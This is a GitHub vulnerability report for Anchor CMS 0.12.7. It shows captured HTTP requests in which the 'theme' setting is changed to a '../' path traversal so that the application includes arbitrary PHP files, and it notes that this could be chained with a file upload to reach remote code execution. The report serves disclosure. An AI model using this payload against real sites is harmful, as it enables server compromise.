Skip to content
This repository has been archived by the owner on May 19, 2020. It is now read-only.

Authenticated path traversal vulnerability. #1334

Open
SecGus opened this issue Apr 23, 2020 · 0 comments
Open

Authenticated path traversal vulnerability. #1334

SecGus opened this issue Apr 23, 2020 · 0 comments

Comments

@SecGus
Copy link

SecGus commented Apr 23, 2020
edited

Summary

An authenticated user can use a path traversal attack (../) in the site settings page to include and run PHP files that exist outside of the webroot.

Expected Behaviour

The application should sanitize and remove all ../ in the path of the new theme to be used.

Actual Behaviour

The application takes the full name of the theme, and appends it to the path of the webroot, meaning, a malicious user can simply back out of the web root and include other php files.

This can then be used to trigger the PHP files and achieve RCE.

Context details (if applicable)

  • Anchor version: 0.12.7
  • Server setup:
  • Reproduce:
    Go to site settings in the "extend" tab, click save and capture the request in burp, this request should look something like:
POST /anchor/admin/extend/metadata HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Origin: http://localhost
Connection: close
Referer: http://localhost/anchor/admin/extend/metadata
Cookie: editor=7drrom2i20hh2i23seuaeb4kk2; front=0v5be0e1bgvd83hrpv0n74vgoq; __stripe_mid=02362ec0-2229-452c-b85e-38e08906325a; anchorcms-install=b3urdm6glrn98b37b9hqu3hf6q; anchorcms=4bp8dlbihb77kbnrgulteak6oj
Upgrade-Insecure-Requests: 1

token=CSRF TOKEN&dashboard_page=panel&sitename=Test&description=Test&home_page=1&posts_page=1&posts_per_page=8&show_all_posts=1&auto_published_comments=1&comment_moderation_keys=asd&theme=default

We can then modify the "theme" value to be whatever file we want to include, for example:

POST /anchor/admin/extend/metadata HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Origin: http://localhost
Connection: close
Referer: http://localhost/anchor/admin/extend/metadata
Cookie: editor=7drrom2i20hh2i23seuaeb4kk2; front=0v5be0e1bgvd83hrpv0n74vgoq; __stripe_mid=02362ec0-2229-452c-b85e-38e08906325a; anchorcms-install=b3urdm6glrn98b37b9hqu3hf6q; anchorcms=4bp8dlbihb77kbnrgulteak6oj
Upgrade-Insecure-Requests: 1

token=CSRF TOKEN&dashboard_page=panel&sitename=Test&description=Test&home_page=1&posts_page=1&posts_per_page=8&show_all_posts=1&auto_published_comments=1&comment_moderation_keys=asd&theme=../../../../../../../../../../../../home/user

After sending said request, we can trigger the PHP file to be run by accessing either the main page (this will run the PHP file /var/www/html/../../../../../../../../../../../../home/user/posts.php) or going to a file that doesn't exists (this will run the PHP file /var/www/html/../../../../../../../../../../../../home/user/404.php). The file names to be run are not optional as far as I can tell, but there could be a way with further investigation.

This attack can be combined with some sort of third file upload, such as an ftp, smb or attachment upload to achieve RCE on the remote server.
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@SecGus